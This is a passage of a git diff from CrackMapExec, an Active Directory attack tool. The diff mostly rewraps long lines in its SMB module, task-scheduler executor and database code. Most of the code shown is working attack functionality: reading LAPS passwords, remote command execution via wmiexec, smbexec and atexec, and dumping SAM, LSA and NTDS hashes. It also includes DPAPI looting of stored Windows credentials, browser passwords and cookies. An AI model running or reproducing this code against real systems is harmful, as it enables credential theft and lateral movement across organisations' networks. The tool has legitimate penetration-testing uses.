"" sAMAccountName = "" @@ -635,19 +572,12 @@ class smb(connection): from impacket.ldap import ldapasn1 as ldapasn1_impacket - results = [ - r for r in results if isinstance(r, ldapasn1_impacket.SearchResultEntry) - ] + results = [r for r in results if isinstance(r, ldapasn1_impacket.SearchResultEntry)] if len(results) != 0: for host in results: - values = { - str(attr["type"]).lower(): str(attr["vals"][0]) - for attr in host["attributes"] - } + values = {str(attr["type"]).lower(): str(attr["vals"][0]) for attr in host["attributes"]} if "mslaps-encryptedpassword" in values: - self.logger.fail( - "LAPS password is encrypted and currently CrackMapExec doesn't support the decryption..." - ) + self.logger.fail("LAPS password is encrypted and currently CrackMapExec doesn't support the decryption...") return False elif "mslaps-password" in values: r = loads(values["mslaps-password"]) @@ -656,16 +586,10 @@ class smb(connection): elif "ms-mcs-admpwd" in values: msMCSAdmPwd = values["ms-mcs-admpwd"] else: - self.logger.fail( - "No result found with attribute ms-MCS-AdmPwd or msLAPS-Password" - ) - logging.debug( - f"Host: {sAMAccountName:<20} Password: {msMCSAdmPwd} {self.hostname}" - ) + self.logger.fail("No result found with attribute ms-MCS-AdmPwd or msLAPS-Password") + logging.debug(f"Host: {sAMAccountName:<20} Password: {msMCSAdmPwd} {self.hostname}") else: - self.logger.fail( - f"msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS property for {self.hostname}" - ) + self.logger.fail(f"msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS property for {self.hostname}") return False @@ -673,9 +597,7 @@ class smb(connection): self.password = msMCSAdmPwd if msMCSAdmPwd == "": - self.logger.fail( - f"msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS property for {self.hostname}" - ) + self.logger.fail(f"msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS property for {self.hostname}") return False if ntlm_hash: @@ -688,13 +610,9 @@ class smb(connection): return True def print_host_info(self): - self.logger.display( - f"{self.server_os}{f' x{self.os_arch}' if self.os_arch else ''} (name:{self.hostname}) (domain:{self.domain}) (signing:{self.signing}) (SMBv1:{self.smbv1})" - ) + self.logger.display(f"{self.server_os}{f' x{self.os_arch}' if self.os_arch else ''} (name:{self.hostname}) (domain:{self.domain}) (signing:{self.signing}) (SMBv1:{self.smbv1})") if self.args.laps: - return self.laps_search( - self.args.username, self.args.password, self.args.hash, self.domain - ) + return self.laps_search(self.args.username, self.args.password, self.args.hash, self.domain) return True def kerberos_login( @@ -737,9 +655,7 @@ class smb(connection): kerb_pass = next(s for s in [self.nthash, password, aesKey] if s) else: kerb_pass = "" - self.logger.debug( - f"Attempting to do Kerberos Login with useCache: {useCache}" - ) + self.logger.debug(f"Attempting to do Kerberos Login with useCache: {useCache}") self.conn.kerberosLogin( username, @@ -758,9 +674,7 @@ class smb(connection): else: self.username = username - used_ccache = ( - " from ccache" if useCache else f":{process_secret(kerb_pass)}" - ) + used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}" else: self.plaintext_login(username, password, self.host) return @@ -789,15 +703,11 @@ class smb(connection): self.logger.fail(f"CCache Error: {e}") return False except OSError as e: - used_ccache = ( - " from ccache" if useCache else f":{process_secret(kerb_pass)}" - ) + used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}" self.logger.fail(f"{domain}\\{self.username}{used_ccache} {e}") except (SessionError, Exception) as e: error, desc = e.getErrorString() - used_ccache = ( - " from ccache" if useCache else f":{process_secret(kerb_pass)}" - ) + used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}" self.logger.fail( f"{domain}\\{self.username}{used_ccache} {error} {f'({desc})' if self.args.verbose else ''}", color="magenta" if error in smb_error_status else "red", @@ -821,21 +731,15 @@ class smb(connection): self.logger.fail(f"Broken Pipe Error while attempting to login") self.check_if_admin() - self.logger.debug( - f"Adding credential: {domain}/{self.username}:{self.password}" - ) + self.logger.debug(f"Adding credential: {domain}/{self.username}:{self.password}") self.db.add_credential("plaintext", domain, self.username, self.password) - user_id = self.db.get_credential( - "plaintext", domain, self.username, self.password - ) + user_id = self.db.get_credential("plaintext", domain, self.username, self.password) host_id = self.db.get_hosts(self.host)[0].id self.db.add_loggedin_relation(user_id, host_id) if self.admin_privs: - self.logger.debug( - f"Adding admin user: {self.domain}/{self.username}:{self.password}@{self.host}" - ) + self.logger.debug(f"Adding admin user: {self.domain}/{self.username}:{self.password}@{self.host}") self.db.add_admin_user( "plaintext", domain, @@ -907,9 +811,7 @@ class smb(connection): self.db.add_loggedin_relation(user_id, host_id) if self.admin_privs: - self.db.add_admin_user( - "hash", domain, self.username, nthash, self.host, user_id=user_id - ) + self.db.add_admin_user("hash", domain, self.username, nthash, self.host, user_id=user_id) out = f"{domain}\\{self.username}:{process_secret(self.hash)} {self.mark_pwned()}" self.logger.success(out) @@ -952,14 +854,10 @@ class smb(connection): self.smbv1 = True except socket.error as e: if str(e).find("Connection reset by peer") != -1: - self.logger.info( - f"SMBv1 might be disabled on {self.host if not kdc else kdc}" - ) + self.logger.info(f"SMBv1 might be disabled on {self.host if not kdc else kdc}") return False except (Exception, NetBIOSTimeout) as e: - self.logger.info( - f"Error creating SMBv1 connection to {self.host if not kdc else kdc}: {e}" - ) + self.logger.info(f"Error creating SMBv1 connection to {self.host if not kdc else kdc}: {e}") return False return True @@ -976,14 +874,10 @@ class smb(connection): self.smbv1 = False except socket.error as e: if str(e).find("Too many open files") != -1: - self.logger.fail( - f"SMBv3 connection error on {self.host if not kdc else kdc}: {e}" - ) + self.logger.fail(f"SMBv3 connection error on {self.host if not kdc else kdc}: {e}") return False except (Exception, NetBIOSTimeout) as e: - self.logger.info( - f"Error creating SMBv3 connection to {self.host if not kdc else kdc}: {e}" - ) + self.logger.info(f"Error creating SMBv3 connection to {self.host if not kdc else kdc}: {e}") return False return True @@ -995,9 +889,7 @@ class smb(connection): return False def check_if_admin(self): - rpctransport = SMBTransport( - self.conn.getRemoteHost(), 445, r"\svcctl", smb_connection=self.conn - ) + rpctransport = SMBTransport(self.conn.getRemoteHost(), 445, r"\svcctl", smb_connection=self.conn) dce = rpctransport.get_dce_rpc() try: dce.connect() @@ -1008,9 +900,7 @@ class smb(connection): try: # 0xF003F - SC_MANAGER_ALL_ACCESS # http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx - ans = scmr.hROpenSCManagerW( - dce, f"{self.host}\x00", "ServicesActive\x00", 0xF003F - ) + ans = scmr.hROpenSCManagerW(dce, f"{self.host}\x00", "ServicesActive\x00", 0xF003F) self.admin_privs = True except scmr.DCERPCException: self.admin_privs = False @@ -1041,9 +931,7 @@ class smb(connection): if method == "wmiexec": try: exec_method = WMIEXEC( - self.host - if not self.kerberos - else self.hostname + "." + self.domain, + self.host if not self.kerberos else self.hostname + "." + self.domain, self.smb_share_name, self.username, self.password, @@ -1054,6 +942,7 @@ class smb(connection): self.kdcHost, self.hash, self.args.share, + logger=self.logger ) self.logger.info("Executed command via wmiexec") break @@ -1064,9 +953,7 @@ class smb(connection): elif method == "mmcexec": try: exec_method = MMCEXEC( - self.host - if not self.kerberos - else self.hostname + "." + self.domain, + self.host if not self.kerberos else self.hostname + "." + self.domain, self.smb_share_name, self.username, self.password, @@ -1083,9 +970,7 @@ class smb(connection): elif method == "atexec": try: exec_method = TSCH_EXEC( - self.host - if not self.kerberos - else self.hostname + "." + self.domain, + self.host if not self.kerberos else self.hostname + "." + self.domain, self.smb_share_name, self.username, self.password, @@ -1104,9 +989,7 @@ class smb(connection): elif method == "smbexec": try: exec_method = SMBEXEC( - self.host - if not self.kerberos - else self.hostname + "." + self.domain, + self.host if not self.kerberos else self.hostname + "." + self.domain, self.smb_share_name, self.conn, self.args.port, @@ -1118,6 +1001,7 @@ class smb(connection): self.kdcHost, self.hash, self.args.share, + self.logger ) self.logger.info("Executed command via smbexec") break @@ -1135,18 +1019,14 @@ class smb(connection): if not isinstance(output, str): output = output.decode(self.args.codec) except UnicodeDecodeError: - self.logger.debug( - "Decoding error detected, consider running chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings" - ) + self.logger.debug("Decoding error detected, consider running chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings") output = output.decode("cp437") output = output.strip() self.logger.debug(f"Output: {output}") if self.args.execute or self.args.ps_execute: - self.logger.success( - f"Executed command {self.args.exec_method if self.args.exec_method else ''}" - ) + self.logger.success(f"Executed command {self.args.exec_method if self.args.exec_method else ''}") buf = StringIO(output).readlines() for line in buf: self.logger.highlight(line.strip()) @@ -1205,9 +1085,7 @@ class smb(connection): try: self.logger.debug(f"domain: {self.domain}") - user_id = self.db.get_user( - self.domain.split(".")[0].upper(), self.username - )[0][0] + user_id = self.db.get_user(self.domain.split(".")[0].upper(), self.username)[0][0] except Exception as e: error = get_error_string(e) self.logger.fail(f"Error getting user: {error}") @@ -1261,9 +1139,7 @@ class smb(connection): if share_name != "IPC$": try: # TODO: check if this already exists in DB before adding - self.db.add_share( - self.hostname, user_id, share_name, share_remark, read, write - ) + self.db.add_share(self.hostname, user_id, share_name, share_remark, read, write) except Exception as e: error = get_error_string(e) self.logger.debug(f"Error adding share: {error}") @@ -1303,9 +1179,7 @@ class smb(connection): self.logger.display("Enumerated sessions") for session in sessions: if session.sesi10_cname.find(self.local_ip) == -1: - self.logger.highlight( - f"{session.sesi10_cname:<25} User:{session.sesi10_username}" - ) + self.logger.highlight(f"{session.sesi10_cname:<25} User:{session.sesi10_username}") return sessions except: pass @@ -1360,9 +1234,7 @@ class smb(connection): for group in groups: if group.name: if not self.args.local_groups: - self.logger.highlight( - f"{group.name:<40} membercount: {group.membercount}" - ) + self.logger.highlight(f"{group.name:<40} membercount: {group.membercount}") group_id = self.db.add_group( self.hostname, group.name, @@ -1376,7 +1248,9 @@ class smb(connection): group_id = self.db.get_groups( group_name=self.args.local_groups, group_domain=domain, - )[0][0] + )[ + 0 + ][0] except IndexError: group_id = self.db.add_group( domain, @@ -1388,13 +1262,9 @@ class smb(connection): # So I put a domain group as a member of a local group which is also a member of another local group. # (╯°□°)╯︵ ┻━┻ if not group.isgroup: - self.db.add_credential( - "plaintext", domain, name, "", group_id, "" - ) + self.db.add_credential("plaintext", domain, name, "", group_id, "") elif group.isgroup: - self.db.add_group( - domain, name, member_count_ad=group.membercount - ) + self.db.add_group(domain, name, member_count_ad=group.membercount) break except Exception as e: self.logger.fail(f"Error enumerating local groups of {self.host}: {e}") @@ -1406,9 +1276,7 @@ class smb(connection): for group_name, group_rid in groups.items(): self.logger.highlight(f"rid => {group_rid} => {group_name}") - group_id = self.db.add_group( - self.hostname, group_name, rid=group_rid - )[0] + group_id = self.db.add_group(self.hostname, group_name, rid=group_rid)[0] self.logger.debug(f"Added group, returned id: {group_id}") return groups @@ -1453,17 +1321,15 @@ class smb(connection): self.logger.success("Enumerated members of domain group") for group in groups: - member_count = ( - len(group.member) if hasattr(group, "member") else 0 - ) - self.logger.highlight( - f"{group.memberdomain}\\{group.membername}" - ) + member_count = len(group.member) if hasattr(group, "member") else 0 + self.logger.highlight(f"{group.memberdomain}\\{group.membername}") try: group_id = self.db.get_groups( group_name=self.args.groups, group_domain=group.groupdomain, - )[0][0] + )[ + 0 + ][0] except IndexError: group_id = self.db.add_group( group.groupdomain, @@ -1487,9 +1353,7 @@ class smb(connection): )[0] break except Exception as e: - self.logger.fail( - f"Error enumerating domain group members using dc ip {dc_ip}: {e}" - ) + self.logger.fail(f"Error enumerating domain group members using dc ip {dc_ip}: {e}") else: try: groups = get_netgroup( @@ -1511,12 +1375,8 @@ class smb(connection): self.logger.success("Enumerated domain group(s)") for group in groups: - member_count = ( - len(group.member) if hasattr(group, "member") else 0 - ) - self.logger.highlight( - f"{group.samaccountname:<40} membercount: {member_count}" - ) + member_count = len(group.member) if hasattr(group, "member") else 0 + self.logger.highlight(f"{group.samaccountname:<40} membercount: {member_count}") if bool(group.isgroup) is True: # Since there isn't a groupmember attribute on the returned object from get_netgroup @@ -1529,9 +1389,7 @@ class smb(connection): )[0] break except Exception as e: - self.logger.fail( - f"Error enumerating domain group using dc ip {dc_ip}: {e}" - ) + self.logger.fail(f"Error enumerating domain group using dc ip {dc_ip}: {e}") return groups def users(self): @@ -1561,9 +1419,7 @@ class smb(connection): self.logger.highlight(f"{domain}\\{host_clean:<30}") break except Exception as e: - self.logger.fail( - f"Error enumerating domain hosts using dc ip {dc_ip}: {e}" - ) + self.logger.fail(f"Error enumerating domain hosts using dc ip {dc_ip}: {e}") break return hosts @@ -1582,14 +1438,10 @@ class smb(connection): if self.args.loggedon_users_filter: for user in logged_on: if re.match(self.args.loggedon_users_filter, user.wkui1_username): - self.logger.highlight( - f"{user.wkui1_logon_domain}\\{user.wkui1_username:<25} {f'logon_server: {user.wkui1_logon_server}' if user.wkui1_logon_server else ''}" - ) + self.logger.highlight(f"{user.wkui1_logon_domain}\\{user.wkui1_username:<25} {f'logon_server: {user.wkui1_logon_server}' if user.wkui1_logon_server else ''}") else: for user in logged_on: - self.logger.highlight( - f"{user.wkui1_logon_domain}\\{user.wkui1_username:<25} {f'logon_server: {user.wkui1_logon_server}' if user.wkui1_logon_server else ''}" - ) + self.logger.highlight(f"{user.wkui1_logon_domain}\\{user.wkui1_username:<25} {f'logon_server: {user.wkui1_logon_server}' if user.wkui1_logon_server else ''}") except Exception as e: self.logger.fail(f"Error enumerating logged on users: {e}") return logged_on @@ -1614,13 +1466,9 @@ class smb(connection): rpc._create_wmi_connection(namespace=namespace) if wmi_query: - query = rpc._wmi_connection.ExecQuery( - wmi_query, lFlags=WBEM_FLAG_FORWARD_ONLY - ) + query = rpc._wmi_connection.ExecQuery(wmi_query, lFlags=WBEM_FLAG_FORWARD_ONLY) else: - query = rpc._wmi_connection.ExecQuery( - self.args.wmi, lFlags=WBEM_FLAG_FORWARD_ONLY - ) + query = rpc._wmi_connection.ExecQuery(self.args.wmi, lFlags=WBEM_FLAG_FORWARD_ONLY) except Exception as e: self.logger.fail(f"Error creating WMI connection: {e}") return records @@ -1668,9 +1516,7 @@ class smb(connection): self.args.only_files, ) else: - spider.spider( - share, folder, pattern, regex, exclude_dirs, depth, content, only_files - ) + spider.spider(share, folder, pattern, regex, exclude_dirs, depth, content, only_files) self.logger.display(f"Done spidering (Completed in {time() - start_time})") @@ -1688,9 +1534,7 @@ class smb(connection): } try: - full_hostname = ( - self.host if not self.kerberos else self.hostname + "." + self.domain - ) + full_hostname = self.host if not self.kerberos else self.hostname + "." + self.domain string_binding = KNOWN_PROTOCOLS[self.args.port]["bindstr"] logging.debug(f"StringBinding {string_binding}") rpc_transport = transport.DCERPCTransportFactory(string_binding) @@ -1701,9 +1545,7 @@ class smb(connection): if hasattr(rpc_transport, "set_credentials"): # This method exists only for selected protocol sequences. - rpc_transport.set_credentials( - self.username, self.password, self.domain, self.lmhash, self.nthash - ) + rpc_transport.set_credentials(self.username, self.password, self.domain, self.lmhash, self.nthash) if self.kerberos: rpc_transport.set_kerberos(self.kerberos, self.kdcHost) @@ -1726,9 +1568,7 @@ class smb(connection): dce.bind(lsat.MSRPC_UUID_LSAT) try: - resp = lsad.hLsarOpenPolicy2( - dce, MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES - ) + resp = lsad.hLsarOpenPolicy2(dce, MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES) except lsad.DCERPCSessionError as e: self.logger.fail(f"Error connecting: {e}") return entries @@ -1740,9 +1580,7 @@ class smb(connection): policy_handle, lsad.POLICY_INFORMATION_CLASS.PolicyAccountDomainInformation, ) - domain_sid = resp["PolicyInformation"]["PolicyAccountDomainInfo"][ - "DomainSid" - ].formatCanonical() + domain_sid = resp["PolicyInformation"]["PolicyAccountDomainInfo"]["DomainSid"].formatCanonical() so_far = 0 simultaneous = 1000 @@ -1759,9 +1597,7 @@ class smb(connection): for i in range(so_far, so_far + sids_to_check): sids.append(f"{domain_sid}-{i:d}") try: - lsat.hLsarLookupSids( - dce, policy_handle, sids, lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta - ) + lsat.hLsarLookupSids(dce, policy_handle, sids, lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta) except DCERPCException as e: if str(e).find("STATUS_NONE_MAPPED") >= 0: so_far += simultaneous @@ -1774,9 +1610,7 @@ class smb(connection): for n, item in enumerate(resp["TranslatedNames"]["Names"]): if item["Use"] != SID_NAME_USE.SidTypeUnknown: rid = so_far + n - domain = resp["ReferencedDomains"]["Domains"][item["DomainIndex"]][ - "Name" - ] + domain = resp["ReferencedDomains"]["Domains"][item["DomainIndex"]]["Name"] user = item["Name"] sid_type = SID_NAME_USE.enumItems(item["Use"]).name self.logger.highlight(f"{rid}: {domain}\\{user} ({sid_type})") @@ -1793,31 +1627,23 @@ class smb(connection): return entries def put_file(self): - self.logger.display( - f"Copying {self.args.put_file[0]} to {self.args.put_file[1]}" - ) + self.logger.display(f"Copying {self.args.put_file[0]} to {self.args.put_file[1]}") with open(self.args.put_file[0], "rb") as file: try: self.conn.putFile(self.args.share, self.args.put_file[1], file.read) - self.logger.success( - f"Created file {self.args.put_file[0]} on \\\\{self.args.share}\\{self.args.put_file[1]}" - ) + self.logger.success(f"Created file {self.args.put_file[0]} on \\\\{self.args.share}\\{self.args.put_file[1]}") except Exception as e: self.logger.fail(f"Error writing file to share {self.args.share}: {e}") def get_file(self): - self.logger.display( - f"Copying {self.args.get_file[0]} to {self.args.get_file[1]}" - ) + self.logger.display(f"Copying {self.args.get_file[0]} to {self.args.get_file[1]}") file_handle = self.args.get_file[1] if self.args.append_host: file_handle = f"{self.hostname}-{self.args.get_file[1]}" with open(file_handle, "wb+") as file: try: self.conn.getFile(self.args.share, self.args.get_file[0], file.write) - self.logger.success( - f"File {self.args.get_file[0]} was transferred to {file_handle}" - ) + self.logger.success(f"File {self.args.get_file[0]} was transferred to {file_handle}") except Exception as e: self.logger.fail(f"Error reading file {self.args.share}: {e}") @@ -1862,9 +1688,7 @@ class smb(connection): self.logger.display("Dumping SAM hashes") SAM.dump() SAM.export(self.output_filename) - self.logger.success( - f"Added {highlight(add_sam_hash.sam_hashes)} SAM hashes to the database" - ) + self.logger.success(f"Added {highlight(add_sam_hash.sam_hashes)} SAM hashes to the database") try: self.remote_ops.finish() @@ -1890,11 +1714,7 @@ class smb(connection): except Exception as e: self.logger.fail(str(e)) - if ( - self.pvkbytes is None - and self.no_da is None - and self.args.local_auth is False - ): + if self.pvkbytes is None and self.no_da is None and self.args.local_auth is False: try: results = self.db.get_domain_backupkey(self.domain) except: @@ -1923,12 +1743,8 @@ class smb(connection): dc_conn = DPLootSMBConnection(dc_target) dc_conn.connect() # Connect to DC if dc_conn.is_admin(): - self.logger.success( - "User is Domain Administrator, exporting domain backupkey..." - ) - backupkey_triage = BackupkeyTriage( - target=dc_target, conn=dc_conn - ) + self.logger.success("User is Domain Administrator, exporting domain backupkey...") + backupkey_triage = BackupkeyTriage(target=dc_target, conn=dc_conn) backupkey = backupkey_triage.triage_backupkey() self.pvkbytes = backupkey.backupkey_v2 self.db.add_domain_backupkey(self.domain, self.pvkbytes) @@ -1958,16 +1774,8 @@ class smb(connection): self.logger.debug(f"Could not upgrade connection: {e}") return - plaintexts = { - username: password - for _, _, username, password, _, _ in self.db.get_credentials( - cred_type="plaintext" - ) - } - nthashes = { - username: nt.split(":")[1] if ":" in nt else nt - for _, _, username, nt, _, _ in self.db.get_credentials(cred_type="hash") - } + plaintexts = {username: password for _, _, username, password, _, _ in self.db.get_credentials(cred_type="plaintext")} + nthashes = {username: nt.split(":")[1] if ":" in nt else nt for _, _, username, nt, _, _ in self.db.get_credentials(cred_type="hash")} if self.password != "": plaintexts[self.username] = self.password if self.nthash != "": @@ -1975,9 +1783,7 @@ class smb(connection): # Collect User and Machine masterkeys try: - self.logger.display( - "Collecting User and Machine masterkeys, grab a coffee and be patient..." - ) + self.logger.display("Collecting User and Machine masterkeys, grab a coffee and be patient...") masterkeys_triage = MasterkeysTriage( target=target, conn=conn, @@ -1995,15 +1801,11 @@ class smb(connection): logging.fail("No masterkeys looted") return - self.logger.success( - f"Got {highlight(len(masterkeys))} decrypted masterkeys. Looting secrets..." - ) + self.logger.success(f"Got {highlight(len(masterkeys))} decrypted masterkeys. Looting secrets...") try: # Collect User and Machine Credentials Manager secrets - credentials_triage = CredentialsTriage( - target=target, conn=conn, masterkeys=masterkeys - ) + credentials_triage = CredentialsTriage(target=target, conn=conn, masterkeys=masterkeys) self.logger.debug(f"Credentials Triage Object: {credentials_triage}") credentials = credentials_triage.triage_credentials() self.logger.debug(f"Triaged Credentials: {credentials}") @@ -2013,9 +1815,7 @@ class smb(connection): self.logger.debug(f"Error while looting credentials: {e}") for credential in credentials: - self.logger.highlight( - f"[{credential.winuser}][CREDENTIAL] {credential.target} - {credential.username}:{credential.password}" - ) + self.logger.highlight(f"[{credential.winuser}][CREDENTIAL] {credential.target} - {credential.username}:{credential.password}") self.db.add_dpapi_secrets( target.address, "CREDENTIAL", @@ -2025,9 +1825,7 @@ class smb(connection): credential.target, ) for credential in system_credentials: - self.logger.highlight( - f"[SYSTEM][CREDENTIAL] {credential.target} - {credential.username}:{credential.password}" - ) + self.logger.highlight(f"[SYSTEM][CREDENTIAL] {credential.target} - {credential.username}:{credential.password}") self.db.add_dpapi_secrets( target.address, "CREDENTIAL", @@ -2040,19 +1838,13 @@ class smb(connection): try: # Collect Chrome Based Browser stored secrets dump_cookies = True if self.args.dpapi == "cookies" else False - browser_triage = BrowserTriage( - target=target, conn=conn, masterkeys=masterkeys - ) - browser_credentials, cookies = browser_triage.triage_browsers( - gather_cookies=dump_cookies - ) + browser_triage = BrowserTriage(target=target, conn=conn, masterkeys=masterkeys) + browser_credentials, cookies = browser_triage.triage_browsers(gather_cookies=dump_cookies) except Exception as e: self.logger.debug(f"Error while looting browsers: {e}") for credential in browser_credentials: cred_url = credential.url + " -" if credential.url != "" else "-" - self.logger.highlight( - f"[{credential.winuser}][{credential.browser.upper()}] {cred_url} {credential.username}:{credential.password}" - ) + self.logger.highlight(f"[{credential.winuser}][{credential.browser.upper()}] {cred_url} {credential.username}:{credential.password}") self.db.add_dpapi_secrets( target.address, credential.browser.upper(), @@ -2065,25 +1857,19 @@ class smb(connection): if dump_cookies: self.logger.display("Start Dumping Cookies") for cookie in cookies: - self.logger.highlight( - f"[{credential.winuser}][{cookie.browser.upper()}] {cookie.host}{cookie.path} - {cookie.cookie_name}:{cookie.cookie_value}" - ) + self.logger.highlight(f"[{credential.winuser}][{cookie.browser.upper()}] {cookie.host}{cookie.path} - {cookie.cookie_name}:{cookie.cookie_value}") self.logger.display("End Dumping Cookies") try: # Collect User Internet Explorer stored secrets - vaults_triage = VaultsTriage( - target=target, conn=conn, masterkeys=masterkeys - ) + vaults_triage = VaultsTriage(target=target, conn=conn, masterkeys=masterkeys) vaults = vaults_triage.triage_vaults() except Exception as e: self.logger.debug(f"Error while looting vaults: {e}") for vault in vaults: if vault.type == "Internet Explorer": resource = vault.resource + " -" if vault.resource != "" else "-" - self.logger.highlight( - f"[{vault.winuser}][IEX] {resource} - {vault.username}:{vault.password}" - ) + self.logger.highlight(f"[{vault.winuser}][IEX] {resource} - {vault.username}:{vault.password}") self.db.add_dpapi_secrets( target.address, "IEX", @@ -2101,9 +1887,7 @@ class smb(connection): self.logger.debug(f"Error while looting firefox: {e}") for credential in firefox_credentials: url = credential.url + " -" if credential.url != "" else "-" - self.logger.highlight( - f"[{credential.winuser}][FIREFOX] {url} {credential.username}:{credential.password}" - ) + self.logger.highlight(f"[{credential.winuser}][FIREFOX] {url} {credential.username}:{credential.password}") self.db.add_dpapi_secrets( target.address, "FIREFOX", @@ -2147,9 +1931,7 @@ class smb(connection): LSA.exportCached(self.output_filename) LSA.dumpSecrets() LSA.exportSecrets(self.output_filename) - self.logger.success( - f"Dumped {highlight(add_lsa_secret.secrets)} LSA secrets to {self.output_filename + '.secrets'} and {self.output_filename + '.cached'}" - ) + self.logger.success(f"Dumped {highlight(add_lsa_secret.secrets)} LSA secrets to {self.output_filename + '.secrets'} and {self.output_filename + '.cached'}") try: self.remote_ops.finish() except Exception as e: @@ -2182,16 +1964,12 @@ class smb(connection): username, _, lmhash, nthash, _, _, _ = hash.split(":") parsed_hash = ":".join((lmhash, nthash)) if validate_ntlm(parsed_hash): - self.db.add_credential( - "hash", domain, username, parsed_hash, pillaged_from=host_id - ) + self.db.add_credential("hash", domain, username, parsed_hash, pillaged_from=host_id) add_ntds_hash.added_to_db += 1 return raise except: - self.logger.debug( - "Dumped hash is not NTLM, not adding to db for now ;)" - ) + self.logger.debug("Dumped hash is not NTLM, not adding to db for now ;)") else: self.logger.debug("Dumped hash is a computer account, not adding to db") @@ -2227,26 +2005,16 @@ class smb(connection): outputFileName=self.output_filename, justUser=self.args.userntds if self.args.userntds else None, printUserStatus=True, - perSecretCallback=lambda secret_type, secret: add_ntds_hash( - secret, host_id - ), + perSecretCallback=lambda secret_type, secret: add_ntds_hash(secret, host_id), ) try: - self.logger.success( - "Dumping the NTDS, this could take a while so go grab a redbull..." - ) + self.logger.success("Dumping the NTDS, this could take a while so go grab a redbull...") NTDS.dump() ntds_outfile = f"{self.output_filename}.ntds" - self.logger.success( - f"Dumped {highlight(add_ntds_hash.ntds_hashes)} NTDS hashes to {ntds_outfile} of which {highlight(add_ntds_hash.added_to_db)} were added to the database" - ) - self.logger.display( - "To extract only enabled accounts from the output file, run the following command: " - ) - self.logger.display( - f"cat {ntds_outfile} | grep -iv disabled | cut -d ':' -f1" - ) + self.logger.success(f"Dumped {highlight(add_ntds_hash.ntds_hashes)} NTDS hashes to {ntds_outfile} of which {highlight(add_ntds_hash.added_to_db)} were added to the database") + self.logger.display("To extract only enabled accounts from the output file, run the following command: ") + self.logger.display(f"cat {ntds_outfile} | grep -iv disabled | cut -d ':' -f1") self.logger.display(f"grep -iv disabled {ntds_outfile} | cut -d ':' -f1") except Exception as e: # if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0: diff --git a/cme/protocols/smb/atexec.py b/cme/protocols/smb/atexec.py index c97ea2f2..36d607a0 100755 --- a/cme/protocols/smb/atexec.py +++ b/cme/protocols/smb/atexec.py @@ -156,9 +156,7 @@ class TSCH_EXEC: logging.info(f"Task XML: {xml}") taskCreated = False logging.info(f"Creating task \\{tmpName}") - tsch.hSchRpcRegisterTask( - dce, f"\\{tmpName}", xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE - ) + tsch.hSchRpcRegisterTask(dce, f"\\{tmpName}", xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE) taskCreated = True logging.info(f"Running task \\{tmpName}") @@ -184,24 +182,18 @@ class TSCH_EXEC: if fileless: while True: try: - with open( - os.path.join("/tmp", "cme_hosted", tmpFileName), "r" - ) as output: + with open(os.path.join("/tmp", "cme_hosted", tmpFileName), "r") as output: self.output_callback(output.read()) break except IOError: sleep(2) else: - peer = ":".join( - map(str, self.__rpctransport.get_socket().getpeername()) - ) + peer = ":".join(map(str, self.__rpctransport.get_socket().getpeername())) smbConnection = self.__rpctransport.get_smb_connection() while True: try: logging.info(f"Attempting to read ADMIN$\\Temp\\{tmpFileName}") - smbConnection.getFile( - "ADMIN$", f"Temp\\{tmpFileName}", self.output_callback - ) + smbConnection.getFile("ADMIN$", f"Temp\\{tmpFileName}", self.output_callback) break except Exception as e: if str(e).find("SHARING") > 0: diff --git a/cme/protocols/smb/database.py b/cme/protocols/smb/database.py index 982e3ff2..d0a97e74 100755 --- a/cme/protocols/smb/database.py +++ b/cme/protocols/smb/database.py @@ -153,40 +153,17 @@ class database: def reflect_tables(self): with self.db_engine.connect() as conn: try: - self.HostsTable = Table( - "hosts", self.metadata, autoload_with=self.db_engine - ) - self.UsersTable = Table( - "users", self.metadata, autoload_with=self.db_engine - ) - self.GroupsTable = Table( - "groups", self.metadata, autoload_with=self.db_engine - ) - self.SharesTable = Table( - "shares", self.metadata, autoload_with=self.db_engine - ) - self.AdminRelationsTable = Table( - "admin_relations", self.metadata, autoload_with=self.db_engine - ) - self.GroupRelationsTable = Table( - "group_relations", self.metadata, autoload_with=self.db_engine - ) - self.LoggedinRelationsTable = Table( - "loggedin_relations", self.metadata, autoload_with=self.db_engine - ) - self.DpapiSecrets = Table( - "dpapi_secrets", self.metadata, autoload_with=self.db_engine - ) - self.DpapiBackupkey = Table( - "dpapi_backupkey", self.metadata, autoload_with=self.db_engine - ) + self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine) + self.UsersTable = Table("users", self.metadata, autoload_with=self.db_engine) + self.GroupsTable = Table("groups", self.metadata, autoload_with=self.db_engine) + self.SharesTable = Table("shares", self.metadata, autoload_with=self.db_engine) + self.AdminRelationsTable = Table("admin_relations", self.metadata, autoload_with=self.db_engine) + self.GroupRelationsTable = Table("group_relations", self.metadata, autoload_with=self.db_engine) + self.LoggedinRelationsTable = Table("loggedin_relations", self.metadata, autoload_with=self.db_engine) + self.DpapiSecrets = Table("dpapi_secrets", self.metadata, autoload_with=self.db_engine) + self.DpapiBackupkey = Table("dpapi_backupkey", self.metadata, autoload_with=self.db_engine) except (NoInspectionAvailable, NoSuchTableError): - print( - "[-] Error reflecting tables - this means there is a DB schema mismatch \n" - "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" - "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" - "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema" - ) + print("[-] Error reflecting tables - this means there is a DB schema mismatch \n" "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" "[-] If you wish to save the old DB data, copy it to a new location (`cp -r 